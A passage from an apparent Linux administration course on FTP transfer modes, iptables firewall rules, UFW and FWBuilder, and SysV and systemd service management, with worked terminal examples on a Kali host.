Before concluding our coverage of FTP, let's briefly talk about two subjects: Active vs. Passive FTP and Binary vs. ASCII modes. Active vs. Passive FTP connections involve the initial FTP port to the server and the resulting FTP server port that is used to send traffic back. In both cases, the server port will be port 21 (in a default configuration). FTP works in two channels, as well. There is the command channel and the data channel. In Active Mode, the port that is used by the FTP server is going to be port 20. The flow for this mode is the host connecting to the FTP Server will use a random port to connect to port 21 of the FTP server on the command channel. The FTP server will communicate from port 20 to a random port on the host that connected to it on the data channel. In Passive Mode, the port that is used by the FTP server is going to be a random port. The flow for this mode is the host connecting to the FTP server will use a random port to connect to port 21 of the FTP server on the command channel. The host connecting sends a PASV command to the FTP server. The FTP server receives the PASV command and responds by connecting from a random port to a random port to the connecting host. Depending on how the FTP server is configured, the network mode on the client may need to be changed.

Binary vs. ASCII modes has to do with how the file is transferred. If the file is a text file, ASCII mode can be used. If the transfer is done from a UNIX to a Microsoft system, ASCII mode will automatically add a
{ #M}
to the end of each newline. If the transfer is from a Microsoft host to a UNIX host, the
{ #M}
will be removed from each newline end. This ensures compatibility with reading a text file when being transferred from one type of system to another. Binary mode will keep the file in its original state, without modifying the newline entries. If transferring a binary, Binary mode should be used. Otherwise the execution of the binary may get corrupted due to the modification of the newline entries. Let's quickly go over the FTP ascii and binary commands.

kali@kali:/var/tmp$ ftp localhost
Connected to localhost.
220 (vsFTPd 3.0.3)
Name (localhost:kali): kali
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ascii
200 Switching to ASCII mode.
ftp> bin
200 Switching to Binary mode.
ftp> exit
221 Goodbye.

ACLs Overview and Netfilter Introduction (iptables -L)

Before we can cover basic firewall configurations, it is important to understand what an Access Control List (ACL) is. An ACL is a list of rules to control access to computer resources. This can be either in the filesystem or network. For the case of this section, we'll strictly be covering network ACLs.

A network ACL will typically have three actions it can take. These would be ACCEPT, DROP, or REJECT. Let's look at a firewall like a guest list at a fancy party. When someone arrives at the party doors, the guest list is checked. If they are on that list under ACCEPT, they are let inside. If they are not on the list, they won't be allowed in the party. This would be the same as DROP. Let's pretend there's a special category of unwelcome guests that may show up. This would fall under the REJECT list, where an explanation is given to the guest that is not allowed in. "Sir, last time we invited you, you ate all the food and didn't leave any for anyone else." Not only would this guest not be allowed in, but a response message is provided by the staff member controlling entry at the door.

Firewalls also have default policy. In this example, the default policy is a DROP (not allow) policy. This means that anyone that isn't on the list is not allowed in the party. If the policy was a default ACCEPT, only those on the list to DROP or REJECT would be not allowed in the party. When it comes to network traffic, it is easiest to have a default ACCEPT policy. There may be many unknown connections that want to be made to a networked device. This is much less secure than a default DROP policy. With a default DROP policy, access is explicitly defined to only allowed trusted devices on the network. The ACL will also be read from the top to the bottom and the rules will be followed in the order in which they are read. This being said, if a rule explicitly allows a type of traffic through and later drops that same type of traffic, the traffic will be allowed. It doesn't matter that there are conflicting rules on the same match. The firewall will take the first action that matches the rules.

The direction of this traffic also needs to be considered. Most times, people think only of traffic coming from the outside of a network to internal network resources. Firewalls also handle the internal network access and can even be what is known as stateless or stateful.

The state, in this case, is the origination of a network session that is established. The firewall will monitor the network traffic and allow sessions that were allowed, to remain allowed. If a user opens a network session from the internal network to an outside resource and the traffic is allowed, the session state will be stored in the firewall records. Any further communication between that internal host and the remote resource will be allowed as long as that session remains open. This takes more computing resources on the firewall and can be considered to be a more robust way to manage network traffic. iptables is a stateless firewall, by default. This can be changed to make the iptables stateful, if desired.

For the sake of keeping this at a basic level, this will not be in scope for this course. It is more important that it is understood that state can play a role in how some firewalls are configured.

The Linux kernel has a packet filtering framework, called netfilter. The utility that hooks into this framework is iptables. iptables is used to create and/or modify ACLs for the Linux firewall. Let's take a look at the default iptables listing.

$ iptables -L
[sudo] password for kali: 
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

$ 

iptables has multiple tables to store different types of ACLs. The default table is called the filter table. This is the only table that we will cover in this course, but you should be aware that the following tables also exist within iptables. The following was taken directly from the manpage of iptables.

filter: This is the default table (if no -t option is passed). It contains the built-in chains INPUT (for packets destined to local sockets), FORWARD (for packets being routed through the box), and OUTPUT (for locally-generated packets).

nat: This table is consulted when a packet that creates a new connection is encountered. It consists of four built-ins: PREROUTING (for altering packets as soon as they come in), INPUT (for altering packets destined for local sockets), OUTPUT (for altering locally-generated packets before routing), and POSTROUTING (for altering packets as they are about to go out). IPv6 NAT support is available since kernel 3.7.

mangle: This table is used for specialized packet alteration. Until kernel 2.4.17 it had two built-in chains: PREROUTING (for altering incoming packets before routing) and OUTPUT (for altering locally-generated packets before routing). Since kernel 2.4.18, three other built-in chains are also supported: INPUT (for packets coming into the box itself), FORWARD (for altering packets being routed through the box), and POSTROUTING (for altering packets as they are about to go out).

raw: This table is used mainly for configuring exemptions from connection tracking in combination with the NOTRACK target. It registers at the netfilter hooks with higher priority and is thus called before ip_conntrack, or any other IP tables. It provides the following built-in chains: PREROUTING (for packets arriving via any network interface) OUTPUT (for packets generated by local processes)

security: This table is used for Mandatory Access Control (MAC) networking rules, such as those enabled by the SECMARK and CONNSECMARK targets. Mandatory Access Control is implemented by Linux Security Modules such as SELinux. The security table is called after the filter table, allowing any Discretionary Access Control (DAC) rules in the filter table to take effect before MAC rules. This table provides the following built-in chains: INPUT (for packets coming into the box itself), OUTPUT (for altering locally-generated packets before routing), and FORWARD (for altering packets being routed through the box).

In the default table (filter), INPUT, FORWARD, and OUTPUT are displayed. These are called chains and define the direction of network traffic flow. INPUT is related to any connection that is coming into the host. OUTPUT is for any connection leaving the host. FORWARD is related to how to redirect network traffic, and will commonly be used in a Linux router configuration. There are more chains in other tables, but those are out-of-scope for this course.

The default policy for each of the chains in the listing are set to ACCEPT, so we can consider the firewall to be completely open. The other policies that can be used are the actions that were mentioned earlier. The possible policies would be ACCEPT, DROP, and REJECT. Let's change the default policy for the FORWARD chain to DROP, since our Kali host is not going to function as a router. We do this with the -P option for the policy.

$ sudo iptables -P FORWARD DROP

$ sudo iptables -L             
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

Now that we have a basis of terms and can list the rules in the default table, let's move on to creating the rules that make up the firewall. Having an understanding that the host has multiple network paths - INPUT (traffic going into the host), OUTPUT (traffic coming out of the host), and FORWARD (traffic that is routed in the host) - is critical in understanding the nature of traffic that we will allow, reject, or drop.

IPTables (Parameters, Modifying Rules with -A/-D/-I)

Covering firewalls as a concept would be useless without analyzing a few rules. Beyond this, it is much stronger if we know how to set iptables and have the capability of setting up the firewall. Let's build on what we learned about ACLs, default policies, actions, and listing the firewall rules on a Linux host.

To begin, let's define some important iptables options. These are used to set the rules of the firewall.

The -p option defines what protocol is to be considered in the rule. The most common protocol types are tcp, udp, and icmp traffic. The all parameter can be passed to the option to cover all possible protocols, as well.

The -s option defines the source address in the connection. The parameter can be a network name, hostname, a network IP address with a /mask value, or simply an IP address of a host. This is the location the network traffic is coming from.

The -d option defines the destination address in the connection. The parameter for the destination also follows the syntax options for the -s option. This is the location the network traffic is going to.

The -i and -o options define the interfaces involved in the connection. -i is for the interface that the connection is going in, and -o is the interface going out. These options will not be covered further in this section, as they are more related to routing and working with the FORWARD chain. It is still useful to know these options as they relate to firewall traffic flow.

Knowing these options alone cannot get us all the way to configuring the firewall rules. We also need to cover how to add, check, delete, insert, and replace rules in the chains.

The -A option is used to append a rule to the chain entered as the parameter. This will add the rule to the end of the rules already in the chain.

The -C option is used to check if the rule is already in the chain. This helps prevent duplicate entries in a chain.

The -D option is used to delete a rule from a chain and can use the rule-specification or the line number.

The -I option is used to insert a rule in a chain using a line number and then the rule-specification to insert in place for that line number. The other rules below that line entry will shift by one, so be careful when inserting multiple rules one after the other.

The -R option is used to replace a rule in a chain using a line number and then the rule-specification to replace the entry in that line. This is different than -I in that the other rule line numbers will not change and the value of the entry line number chosen will be replaced with the new value. Be careful not to replace the wrong entry, as that will remove the rule from the chain.

Now that we have the important options covered, let's work with adding some firewall rules with iptables. For the following demonstrations, the IP addresses used will be arbitrary. This is meant to demonstrate how to work with the iptables utility.

$ sudo iptables -s 192.168.1.0/24 -p all -A INPUT
[sudo] password for kali:

$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
           all  --  192.168.1.0/24       anywhere

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
                                                                                                                                                                                                                             
$

For the sake of this activity, let's add some more arbitrary rules to the INPUT chain. Let's add the localhost IP, 127.0.0.1, as the source and destination. Let's also add the IP address of 192.168.1.37 as the source with the TCP protocol.

$ sudo iptables -s 127.0.0.1 -d 127.0.0.1 -A INPUT

$ sudo iptables -s 192.168.1.37 -p tcp -A INPUT

$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
           all  --  192.168.1.0/24       anywhere            
           all  --  localhost            localhost
           tcp  --  192.168.1.37         anywhere      

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

$

Let's now append another firewall rule for the name localhost and see what happens. For this, let's just add it as the source address.

$ sudo iptables -s localhost -A INPUT

$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
           all  --  192.168.1.0/24       anywhere            
           all  --  localhost            localhost           
           tcp  --  192.168.1.37         anywhere            
           all  --  localhost            anywhere
           all  --  localhost            anywhere   

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

$

Notice that the first time we added the literal IP for the localhost, 127.0.0.1. That rule-specificaiton resolved in the sudo iptables -L output to localhost. When we used localhost as the source address in this last command execution, there are now two entries with the same information. This is due to localhost being resolved to the IPv4 address and the IPv6 address. Again, those addresses resolve back to localhost in the output. Let's take a look at deleting these duplicate lines we just added.

$ sudo iptables -s localhost -D INPUT

$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
           all  --  192.168.1.0/24       anywhere            
           all  --  localhost            localhost           
           tcp  --  192.168.1.37         anywhere            

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

The command to delete the duplicate rule ended up removing both of the rules. It didn't delete the other rule with localhost, since the destination specification was different between the rules added in the last command and the other rule-specification added previously. Let's append that rule again and list it with the --line-numbers option.

$ sudo iptables -s localhost -A INPUT

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.0/24       anywhere            
2               all  --  localhost            localhost           
3               tcp  --  192.168.1.37         anywhere            
4               all  --  localhost            anywhere            
5               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

Now that we can see the line numbers in the output. If we use the line number to delete one of the duplicate entries, we can avoid removing all entries that fit the same rule-specification. Let's do this now.

$ sudo iptables -D INPUT 5

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.0/24       anywhere            
2               all  --  localhost            localhost           
3               tcp  --  192.168.1.37         anywhere            
4               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

It is important to note that firewalls work from the top of the list and go to each next line until a match is found. This being said, if there are conflicts between rules, the first line read will be the one used in the firewall configuration. If we look at the output again, we can see there may be a current conflict with the 192.168.1.0/24 network and the 192.168.1.37 host. Let's insert the rule-specification for 192.168.1.37 to line 1 and then delete the duplicate entry that already was in the list.

$ sudo iptables -s 192.168.1.37 -I INPUT 1

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.37         anywhere
2               all  --  192.168.1.0/24       anywhere            
3               all  --  localhost            localhost           
4               tcp  --  192.168.1.37         anywhere   
5               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$ sudo iptables -D INPUT 4

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.37         anywhere            
2               all  --  192.168.1.0/24       anywhere            
3               all  --  localhost            localhost           
4               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

We can also show the amount of traffic in terms of packets and bytes with the -v option. Let's take a look at what the traffic data is currently. In the command, we can also add the -n option to only display the IP addresses, instead of the canonical names. The output in your terminal session will be different.

$ sudo iptables -nvL
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0            all  --  *      *       192.168.1.37         0.0.0.0/0           
   78  5464            all  --  *      *       192.168.1.0/24       0.0.0.0/0           
    6   504            all  --  *      *       127.0.0.1            127.0.0.1           
   14   904            all  --  *      *       127.0.0.1            0.0.0.0/0           

Chain FORWARD (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

$

Let's generate some network traffic from our localhost to our localhost with the ping utility. After the ping, let's look at the traffic amount again. Again, your output results will be different than the listing shown.

$ ping -c 10 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.037 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.064 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.029 ms
64 bytes from 127.0.0.1: icmp_seq=5 ttl=64 time=0.029 ms
64 bytes from 127.0.0.1: icmp_seq=6 ttl=64 time=0.046 ms
64 bytes from 127.0.0.1: icmp_seq=7 ttl=64 time=0.043 ms
64 bytes from 127.0.0.1: icmp_seq=8 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=9 ttl=64 time=0.028 ms
64 bytes from 127.0.0.1: icmp_seq=10 ttl=64 time=0.033 ms

--- 127.0.0.1 ping statistics ---
10 packets transmitted, 10 received, 0% packet loss, time 9199ms
rtt min/avg/max/mdev = 0.019/0.035/0.064/0.011 ms

$ sudo iptables -nvL
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0            all  --  *      *       192.168.1.37         0.0.0.0/0           
   78  5464            all  --  *      *       192.168.1.0/24       0.0.0.0/0           
   26  2184            all  --  *      *       127.0.0.1            127.0.0.1           
   34  2584            all  --  *      *       127.0.0.1            0.0.0.0/0           

Chain FORWARD (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

$

One last thing before we move on is that iptables is not persistent on a reboot. The rules must be saved with the iptables-save command. Let's go ahead and save the current rules now.

$ sudo iptables-save
# Generated by iptables-save v1.8.7 on Mon Jul 19 06:07:27 2021
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -s 192.168.1.37/32 
-A INPUT -s 192.168.1.0/24 
-A INPUT -s 127.0.0.1/32 -d 127.0.0.1/32 
-A INPUT -s 127.0.0.1/32 
COMMIT
# Completed on Mon Jul 19 06:07:27 2021

$

Now that we covered how to work with adding rules to the firewall and modifying those, let's take a look at refining these rules further to make a more practical firewall.

IPTables (Extended Rules and Default Policies)

Extended rules make the firewall more practical for filtering traffic based on multiple conditions. These are important to understand if the network traffic needs to be considered when creating the firewall ruleset.

In the last section, we took a look at the process of adding, removing, and inserting rules within a chain in the iptables. If you thought through the demonstration we did, "These rules don't look like they do anything," you'd be absolutely right! The default policy on the INPUT chain is ACCEPT, and the rules we added followed that default policy. Since the action wasn't added in the commands we entered, the default policy action is inherited. Even if we changed the default policy to a different action, with the -P option, the rules in the chain would still inherit that policy action.

Let's take another look at the iptables we have set up already. Again, your output may appear differently than the demonstration.

$ sudo iptables -L --line-numbers
[sudo] password for kali: 
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.37         anywhere            
2               all  --  192.168.1.0/24       anywhere            
3               all  --  localhost            localhost           
4               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

In the rule listing, let's suppose that we want to drop all traffic from the 192.168.1.0/24 network but still allow the host at 192.168.1.37. Let's replace the rule for the network and add the DROP target with the -j option.

$ sudo iptables -R INPUT 2 -s 192.168.1.0/24 -j DROP

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               all  --  192.168.1.37         anywhere            
2    DROP       all  --  192.168.1.0/24       anywhere            
3               all  --  localhost            localhost           
4               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

As shown in the listing above, the target changed to DROP for the 192.168.1.0/24 network. Since firewalls work by reading the first rule and moving to the next until a match is found, the 192.168.1.37 host will still have access to our host. Let's refine the access of this host to only the TCP port 8080 to our localhost. Again, we'll use the replace option (-R) for this line entry. To specify the port, we will use the --dport (destination port) option.

$ sudo iptables -R INPUT 1 -s 192.168.1.37 -d 127.0.0.1 -p tcp --dport 8080

$ sudo iptables -nL --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1               tcp  --  192.168.1.37         127.0.0.1            tcp dpt:8080
2    DROP       all  --  192.168.1.0/24       0.0.0.0/0           
3               all  --  127.0.0.1            127.0.0.1           
4               all  --  127.0.0.1            0.0.0.0/0           

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

If the source port is known and is relevant a firewall rule, the --sport option can be used to specify that. There is another option that can be used to create rules based on the type of connection made. This option is part of the conntrack module, which used the -m conntrack option. This subset of the module is the --ctstate option, which is part of the iptables-extensions package. There are more connection tracking states, but here are some important connection states. Note that on older Linux kernels, this would show as --state instead of --ctstate.

INVALID: The packet is associated with no known connection.

NEW: The packet has started a new connection or otherwise associated with a connection that has not seen packets in both directions.

ESTABLISHED: The packet is associated with a connection that has seen packets in both directions.

RELATED: The packet is starting a new connection, but is associated with an existing connection, such as an FTP data transfer or an ICMP error.

UNTRACKED: The packet is not tracked at all, which happens if you explicitly untrack it by using -j CT --notrack in the raw table.

Utilizing conntrack will make the iptables a stateful firewall.

This is to ensure that packets that are part of an existing connection, let's insert the following as a new rule.

$ sudo -I INPUT 1 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

$ sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1    ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
2               tcp  --  192.168.1.37         localhost            tcp dpt:http-alt
4    DROP       all  --  192.168.1.0/24       anywhere            
5               all  --  localhost            localhost           
6               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

$

It's a good practice to add a DROP action for any packet that has an INVALID connection state. Let's start by inserting this rule at the beginning of the INPUT chain. Your output may appear different than the demonstration, but the first rule should look the same.

$ sudo iptables -I INPUT 2 -m conntrack --ctstate INVALID -j DROP

$  sudo iptables -L --line-numbers
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination         
1    ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
2    DROP       all  --  anywhere             anywhere             ctstate INVALID
3               tcp  --  192.168.1.37         localhost            tcp dpt:http-alt
4    DROP       all  --  192.168.1.0/24       anywhere            
5               all  --  localhost            localhost           
6               all  --  localhost            anywhere            

Chain FORWARD (policy DROP)
num  target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
num  target     prot opt source               destination         

kali@kali~$

With this configuration of the firewall rules, any traffic that originates from our host will be accepted back into our host. The INVALID connections will immediately be dropped, as well.

Now that we covered extended rules, default policies, additional options, and creating a stateful firewall with iptables, you should now have the knowledge to create custom rule sets to satisfy a network's or host's firewall needs.

UFW and FWBuilder

Sometimes, it's easier to have a frontend interface to handle the firewall rules. There are two tools that we can use to accomplish this: UFW (Uncomplicated Firewall) and FWBuilder. Both of these tools are simply frontend interfaces that leverage the power of iptables.

First, let's look more at UFW. We can install this with sudo apt install ufw.

Now that UFW is installed, we can check the status of the firewall with the sudo ufw status command. Let's go ahead and do this.

$ sudo ufw status
Status: inactive

The power of UFW lies in its convenience of use. It is a simple tool to add firewall rules. This can be done based on the applications installed on a host. To view the list of applications installed on the host that UFW can affect, run the sudo ufw app list command. Your output may be different than the demonstration.

$ sudo ufw app list
Available applications:
  AIM
  Bonjour
  CIFS
  DNS
---
Output trimmed
---
  SSH
  Samba
  Socks
  Telnet
  Transmission
  Transparent Proxy
  VNC
  WWW
  WWW Cache
  WWW Full
  WWW Secure
---
Output trimmed

$

SSH is highlighted in the listing. We can get more information about this application with the sudo ufw app info SSH. Note that case-sensitivity may affect the tool's output.

$ sudo ufw app info SSH
Profile: SSH
Title: SSH server
Description: SSH server

Port:
  22/tcp
 
$

To allow traffic through the firewall related to the application, we can use the allow directive. Let's allow SSH to the firewall rules.

$ sudo ufw allow SSH
Rules updated
Rules updated (v6)

$

Now that SSH is added to the host firewall, the firewall needs to be enabled.

$ sudo ufw enable
Firewall is active and enabled on system startup

$ sudo ufw status
Status: active

To                         Action      From
--                         ------      ----
SSH                        ALLOW       Anywhere                  
SSH (v6)                   ALLOW       Anywhere (v6)             

$

As shown in the listing, SSH is allowed on the host firewall from Anywhere. This is only a basic coverage of the ufw tool. Before moving on to FWBuilder, let's disable UFW.

$ sudo ufw disable
Firewall stopped and disabled on system startup

$ sudo ufw status
Status: inactive/

$

With UFW disabled, we can quickly look at FWBuilder and the GUI interface it has to offer.

To use fwbuilder, enter sudo fwbuilder. Your output may be different than the demonstration.

$ sudo fwbuilder
Firewall Builder GUI 5.3.7
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'

The GUI interface is a drag-and-drop interface. This is especially convenient when rules are out of order and need to be moved around. The modifications of rules are done in the lower Editor portion of the screen. The Editor pane will change depending on what is selected in the Policy pane.

It may be important to note that fwbuilder can automatically translate IPv4 and IPv6 addresses, or rules can be specified to fit either need. When finished with building the firewall rules in the GUI interface, the rules can be compiled and installed on the host. The generated file from the compilation is a script that will execute the rules set for the platform specified. In the case of the demonstration, the platform is iptables.

Managing Network Services

It is important to know and understand how services work on Linux systems. These services make up the capabilities of a host or network and can be leveraged to gain more privileges on a host or gain access to another host on a network. Beyond the benefits of understanding this from a security perspective, it is also valuable for a Linux System Administrator to know how to work with services on a system to ensure full system functionality. In this section, we'll be looking at two variations of Linux services: SysV Init and Systemd.

SysV (service, init)

The service type, called SysV Init, is the legacy version of how Linux services work. Despite this being considered legacy, it is still widely in use and Systemd is backward compatible with it. To best understand services run on a system, it is important to define what runlevels are. Runlevels are designations set to how a Linux system starts and what services are running. They are divided into 7 categories.

  1. is the system state when it is halted - or powered off. This is not an effective runlevel, but it can be called on to execute a system shutdown.
  2. is known as Single User Mode. This is the state where only one user (root) can log into the system to conduct administrative tasks. Networking is disabled for this runlevel. The command-line interface is used.
  3. is Multiuser Mode. The network is disabled and the command-line interface is used.
  4. is Multiuser Mode with Networking. The command-line interface is used.
  5. is an Undefined Mode by default. This is available for a custom runlevel is wanted.
  6. is Multiuser Mode with a Graphical User Interface. Networking is also enabled. This is the default runlevel on any Linux distribution that is using a GUI.
  7. is the runlevel to restart the Linux host. This is another runlevel that is not effective, but it can be called on to execute a system restart.

To display the current working runlevel, the runlevel can be entered in the terminal. Let's do this to see the current runlevel of our Kali host.

$ runlevel
N 5

The configuration to set a Linux system's default runlevel is /etc/inittab. Let's take a look at a typical /etc/inittab file. It is important to know that Kali does not use SysV Init, so many of the concepts in this section will not be present in our Kali installation. For the following demonstration, a legacy version of Ubuntu is used to be able to showcase the concepts we are covering.

root@e1bf7396aea4:/# cat /etc/inittab
# /etc/inittab: init(8) configuration.
# $Id: inittab,v 1.91 2002/01/25 13:35:21 miquels Exp $

# The default runlevel.
id:2:initdefault:

# Boot-time system configuration/initialization script.
# This is run first except when booting in emergency (-b) mode.
si::sysinit:/etc/init.d/rcS

# What to do in single-user mode.
~~:S:wait:/sbin/sulogin

# /etc/init.d executes the S and K scripts upon change
# of runlevel.
#
# Runlevel 0 is halt.
# Runlevel 1 is single-user.
# Runlevels 2-5 are multi-user.
# Runlevel 6 is reboot.

l0:0:wait:/etc/init.d/rc 0
l1:1:wait:/etc/init.d/rc 1
l2:2:wait:/etc/init.d/rc 2
l3:3:wait:/etc/init.d/rc 3
l4:4:wait:/etc/init.d/rc 4
l5:5:wait:/etc/init.d/rc 5
l6:6:wait:/etc/init.d/rc 6

---
Output Trimmed
---

root@e1bf7396aea4:/#

This /etc/inittab file is from an Ubuntu 6.06 installation. In the listing above, several entries are highlighted. The id:2:initdefault: line is the default runlevel for this host. The format for these lines is unique identifier:runlevel:action:process. For this installation, the default runlevel is Runlevel 2. In the si::sysinit:/etc/init.d/rcS line, the unique identifier is si. There is no associated runlevel. The action to take is sysinit. The process is /etc/init.d/rcS, which is a script that will execute when this identifier is called.

To change the current runlevel to a different one, we can enter the runlevel command. If we wanted to change the runlevel to Runlevel 3, for instance, we would enter runlevel 3. To avoid breaking our connection with the Kali host, let's not do this. Regardless of us not exercising a runlevel change, be aware of how to do it.

Each runlevel will have a respective /etc/rc#.d/ directory associated with it. This is used to add the services that will be started for that runlevel in the form of scripts. Let's take a look at /etc/rc2.d/ on this Ubuntu host.

root@4f165cb1f679:/# ls /etc/rc2.d/
S10sysklogd  S11klogd  S20makedev  S20ssh  S99rc.local  S99rmnologin

In the listing above, 6 startup (S) scripts are shown. These are run in alphanumeric order as the system enters the Runlevel 2 state.

The service scripts are located in /etc/init.d/ by default on a SysV Init system. Let's take a look at what scripts are available on the Ubuntu host.

root@4f165cb1f679:/# ls /etc/init.d/
README        bootlogd     checkroot.sh       halt         keymap.sh  makedev            mountdevsubfs  networking   quota     rc.local  rmnologin  skeleton       sysklogd  umountnfs.sh  waitnfs.sh
alsa-utils    bootmisc.sh  console-screen.sh  hostname.sh  klogd      module-init-tools  mountvirtfs    pcmciautils  quotarpc  rcS       sendsigs   ssh            udev      umountroot
bootclean.sh  checkfs.sh   glibc.sh           hwclock.sh   loopback   mountall.sh        mtab           procps.sh    rc        reboot    single     stop-bootlogd  umountfs  urandom

In the listing above, ssh is included in the listing. We can work with services, outside of runlevels, with manual execution of the scripts in the /etc/init.d/ directory. Let's start ssh service.

root@6126fd75c46c:/# /etc/init.d/ssh start
 * Starting OpenBSD Secure Shell server...                                                                                                                                                                            [ ok ] 

The ok response states that the ssh service was started and is running. There are many other possibilities for service actions. Let's execute the ssh script without a parameter to see the actions we may be able to take.

root@6126fd75c46c:/# /etc/init.d/ssh
 * Usage: /etc/init.d/ssh {start|stop|reload|force-reload|restart}

It is important to note that not all service scripts will have a Usage displayed when the script is executed in an unaccepted way. This example is to demonstrate that {start|stop|reload|force-reload|restart} can be added to the script execution to take different actions with the service.

Let's shift our focus back on our Kali host to cover one last thing about SysV Init, the service command. Even though this technically isn't the service utility, the functionality remains the same as though it were. The syntax for the service utility is service > service-name {start|stop|status}. Let's start, get the status, and stop the ssh service on our Kali host.

$ sudo service ssh start
[sudo] password for kali: 

$ sudo service ssh status
● ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
     Active: active (running) since Thu 2021-07-22 11:02:55 MST; 1min 3s ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 64702 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
   Main PID: 64703 (sshd)
      Tasks: 1 (limit: 4631)
     Memory: 1.0M
        CPU: 17ms
     CGroup: /system.slice/ssh.service
             └─64703 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups

Jul 22 11:02:55 kali systemd[1]: Starting OpenBSD Secure Shell server...
Jul 22 11:02:55 kali sshd[64703]: Server listening on 0.0.0.0 port 22.
Jul 22 11:02:55 kali sshd[64703]: Server listening on :: port 22.
Jul 22 11:02:55 kali systemd[1]: Started OpenBSD Secure Shell server.

$ sudo service ssh stop

$

The listing shows that the service is running after we execute the start action of the service. This is very similar to the ssh script shown in the /etc/init.d/ directory previously. service is considered to be a legacy command, so it may become less common to see SysV Init systems in the wild.

Systemd (sytemctl)

Most Linux systems today are using a service startup system called Systemd. With this usage, it is important to understand how the services are managed. This section will cover how to determine if a Linux system is using Systemd, how to work with system services, why Linux moved away from SysV Init, and the similarities between the two.

Before moving into the details of Systemd, let's figure out if Kali is using Systemd. To do this, we can look at the first process that was created on the Linux host. We can do this with the ps 1 command.

$ ps 1
    PID TTY      STAT   TIME COMMAND
      1 ?        Ss     0:05 /sbin/init splash

/sbin/init is historically a process that is used by SysV Init. Let's look at that file to see what it is. We'll use the file command to do this.

$ file /sbin/init
/sbin/init: symbolic link to /lib/systemd/systemd

